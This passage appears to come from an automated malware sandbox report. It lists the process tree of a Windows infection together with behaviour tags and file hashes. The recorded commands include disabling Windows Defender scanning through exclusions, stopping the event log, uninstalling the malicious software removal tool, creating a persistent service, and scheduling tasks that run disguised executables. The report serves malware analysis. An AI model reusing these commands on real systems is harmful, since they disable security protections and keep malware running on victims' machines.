                                                                                                                                                                                      PID:5424
                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                      PID:2344
                                                                                                                                                                                    • C:\Windows\system32\dialer.exe
                                                                                                                                                                                      C:\Windows\system32\dialer.exe
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:2948
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        C:\Windows\system32\sc.exe delete "BlockPerfDll"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:5036
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        C:\Windows\system32\sc.exe create "BlockPerfDll" binpath= "C:\ProgramData\HyperblockbrowserCrt.exe" start= "auto"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:1144
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:5408
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        C:\Windows\system32\sc.exe start "BlockPerfDll"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Launches sc.exe
                                                                                                                                                                                        PID:6108
                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:5576
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\StartMenuExperienceHost.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:1956
                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:856
                                                                                                                                                                                              • C:\Windows\system32\choice.exe
                                                                                                                                                                                                choice /C Y /N /D Y /T 3
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:3968
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                          PID:636
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff80c1ccc40,0x7ff80c1ccc4c,0x7ff80c1ccc58
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:3628
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,10769881656413447238,10722835594241246728,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1888 /prefetch:2
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:5832
                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1900,i,10769881656413447238,10722835594241246728,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2144 /prefetch:3
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:3236
                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,10769881656413447238,10722835594241246728,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2464 /prefetch:8
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:824
                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,10769881656413447238,10722835594241246728,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3152 /prefetch:1
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:5736
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,10769881656413447238,10722835594241246728,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3192 /prefetch:1
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:5720
                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4556,i,10769881656413447238,10722835594241246728,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4568 /prefetch:1
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:5504
                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4688,i,10769881656413447238,10722835594241246728,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4592 /prefetch:8
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:5948
                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4804,i,10769881656413447238,10722835594241246728,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4816 /prefetch:8
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2804
                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4844,i,10769881656413447238,10722835594241246728,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4824 /prefetch:8
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:1380
                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4764,i,10769881656413447238,10722835594241246728,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4756 /prefetch:8
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:5324
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                PID:2180
                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:3152
                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:3684
                                                                                                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:3884
                                                                                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Suspicious use of UnmapMainImage
                                                                                                                                                                                                                    PID:4036
                                                                                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Suspicious use of UnmapMainImage
                                                                                                                                                                                                                    PID:4120
                                                                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:3484
                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:3748
                                                                                                                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                        PID:1928
                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                        PID:3732
                                                                                                                                                                                                                      • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                                                        C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:4028
                                                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:2876
                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:2884
                                                                                                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:3480
                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:4800
                                                                                                                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:3212
                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:208
                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:1472
                                                                                                                                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:4356
                                                                                                                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:640
                                                                                                                                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                            PID:2968
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 10 /tr "'C:\Windows\Performance\powershell.exe'" /f
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                              PID:5448
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Windows\Performance\powershell.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                              PID:3328
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 11 /tr "'C:\Windows\Performance\powershell.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                              PID:3532
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Windows\es-ES\backgroundTaskHost.exe'" /f
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                              PID:5828
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\es-ES\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                              PID:1856
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Windows\es-ES\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                              PID:3604
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\backgroundTaskHost.exe'" /f
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                              PID:1632
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                              PID:5816
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                              PID:5976
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Program Files\Mozilla Firefox\uninstall\conhost.exe'" /f
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                              PID:1612
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\uninstall\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                              PID:5176
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Mozilla Firefox\uninstall\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                              PID:5240
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                              PID:5748
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                              PID:5740
                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                              schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                              PID:5852
                                                                                                                                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:6128
                                                                                                                                                                                                                                            • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:5596
                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:1812
                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:5804
                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:5292
                                                                                                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:4944
                                                                                                                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:1936
                                                                                                                                                                                                                                                        • C:\ProgramData\HyperblockbrowserCrt.exe
                                                                                                                                                                                                                                                          C:\ProgramData\HyperblockbrowserCrt.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                          PID:5552
                                                                                                                                                                                                                                                          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                            PID:5828
                                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:1348
                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:5468
                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:5256
                                                                                                                                                                                                                                                                  • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                                                                                    wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:2292
                                                                                                                                                                                                                                                                  • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • Power Settings
                                                                                                                                                                                                                                                                    PID:5364
                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:372
                                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Power Settings
                                                                                                                                                                                                                                                                      PID:5568
                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:4440
                                                                                                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Power Settings
                                                                                                                                                                                                                                                                        PID:1256
                                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:2332
                                                                                                                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Power Settings
                                                                                                                                                                                                                                                                          PID:4640
                                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:4152
                                                                                                                                                                                                                                                                          • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:1548
                                                                                                                                                                                                                                                                            • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:5752
                                                                                                                                                                                                                                                                              • C:\Windows\system32\dialer.exe
                                                                                                                                                                                                                                                                                dialer.exe
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                PID:4008

                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              264KB

                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                              f50f89a0a91564d0b8a211f8921aa7de

                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                              112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                              b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                              bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

